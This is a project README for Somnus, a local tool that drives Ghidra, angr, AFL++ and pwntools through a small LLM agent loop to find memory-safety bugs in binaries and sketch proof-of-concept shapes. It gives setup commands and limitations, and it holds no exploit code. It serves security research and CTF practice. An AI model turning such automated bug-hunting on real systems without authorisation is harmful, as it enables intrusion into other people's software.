Local-first reverse engineering orchestrator. Drives Ghidra, angr, Frida, rizin, QEMU, AFL++ and pwntools through a small-model LLM loop to triage binaries, identify likely bugs, and persist structured findings.
No API keys. No network calls. Everything runs on your machine.
Given a binary target, Somnus:
- Runs fast triage (protections, imports, dangerous calls, function inventory).
- Decompiles every function with Ghidra (cached per target).
- Pattern-matches the decompiled C for classic bug signatures (stack BOF, format string, command injection, integer overflow).
- Lets a local LLM reason over the compacted preview and call follow-up tools (zoom into one function, check reachability, propose a PoC shape).
- Persists findings and artifacts to SQLite — resumable, queryable.
Working prototype. Verified end-to-end on ROP Emporium ret2win (x86_64): correctly identifies the read() overflow in pwnme, the ret2win gadget address, and computes the 40-byte overflow offset. Generalization beyond simple CTF stack-BOF challenges is not yet tested.
- Python 3.11+
- Ollama for the local LLM (or any OpenAI-compatible server: llama.cpp, vLLM, LM Studio)
- A model with tool-use support (
qwen3:8bis the recommended default) - Ghidra 11+ with JDK 21 (required for decompilation)
- Optional:
rizinon PATH (faster triage), QEMU (crash verification), AFL++ (fuzzing)
git clone https://github.com/AshtonVaughan/somnus.git
cd somnus
python -m venv .venv
# Windows:
.venv\Scripts\activate
# macOS/Linux:
source .venv/bin/activate
pip install -e ".[tui]"Pull a local model:
ollama pull qwen3:8bPoint Somnus at Ghidra (once, permanent):
# Windows PowerShell
[System.Environment]::SetEnvironmentVariable("GHIDRA_INSTALL_DIR", "C:\tools\ghidra_12.0.4_PUBLIC", "User")
# macOS/Linux
export GHIDRA_INSTALL_DIR="$HOME/tools/ghidra_12.0.4_PUBLIC"# check which adapters are available
somnus adapters
# binary metadata
somnus info targets/mybinary
# run the full agent loop (CLI, streaming progress)
somnus hunt targets/mybinary --goal "Triage and identify any memory-safety bugs."
# run with the live TUI (three panes: transcript, findings, tool output)
somnus tui targets/mybinary
# list persisted findings
somnus findings targets/mybinary# Ollama (default)
somnus hunt targets/bin --model qwen3:8b
somnus hunt targets/bin --model qwen3-coder:30b-a3b # if you have the VRAM
# llama.cpp / vLLM / LM Studio
somnus hunt targets/bin --provider openai \
--host http://localhost:8080/v1 \
--model my-local-modelEnvironment variables (see .env.example):
| Variable | Default | Purpose |
|---|---|---|
SOMNUS_LLM |
ollama |
Backend: ollama or openai |
SOMNUS_OLLAMA_MODEL |
qwen3:8b |
Ollama model tag |
OLLAMA_HOST |
http://localhost:11434 |
Ollama daemon URL |
SOMNUS_OPENAI_BASE |
http://localhost:8080/v1 |
OpenAI-compat server URL |
SOMNUS_THINK |
off | Set to 1 to enable Qwen3 thinking mode |
GHIDRA_INSTALL_DIR |
unset | Path to your Ghidra install |
target -> Triage (rizin, pwntools)
-> Decompile (Ghidra headless, cached)
-> Pattern matcher emits SUSPECTED findings
-> Agent loop:
LLM picks next tool
adapter runs, normalizes output
finding store updated
repeat until budget or goal met
-> Verifier (angr reachability / crash PoC)
-> Report
See docs/architecture.md for full diagram and design principles.
| Adapter | Tool | Status |
|---|---|---|
rizin |
rizin / radare2 via r2pipe | triage |
pwntools |
pwntools ELF | protections + GOT/PLT |
ghidra |
Ghidra headless + post-script | decompilation + pattern matcher |
angr |
angr | CFG, symbolic reachability |
qemu |
QEMU user-mode | crash PoC verification |
frida |
Frida | runtime hooks |
aflpp |
AFL++ | coverage-guided fuzzing |
Every adapter returns (Artifact[], Finding[]). The LLM never sees raw tool output — only the normalized preview built by somnus/agent/preview.py.
Local tool-use reliability is the bottleneck. Recommendations for a 2026 machine:
| VRAM / unified memory | Model |
|---|---|
| 6-8 GB | gemma4:e4b (4B, agent-trained) |
| 8-12 GB | qwen3:8b (default) |
| 16-24 GB | qwen3-coder:30b-a3b (MoE, 3B active, strong code reasoning) |
| 48 GB+ | qwen3-coder:next (80B-A3B) |
Sub-4B models emit malformed tool-call JSON and hallucinate function names; don't bother.
- Verified on one textbook CTF binary. Novel-bug discovery on real codebases is unproven.
- Pattern matcher catches
gets/fgets/strcpy/sprintf/read/printf(arg)/system(arg). No UAF, no integer overflow, no logic bugs. - No runtime verification on Windows without WSL. Reachability via angr is the current gate.
- Stripped binaries degrade function identification. Name-based priority lists (
pwnme,ret2win, etc.) only fire with symbols present. - x86_64 is the primary target. ARM/MIPS work through Ghidra but address math and PoC shapes assume x86_64.
MIT. See LICENSE.
Issues and PRs welcome. Keep adapters small and self-contained — the orchestrator only cares about Artifact / Finding.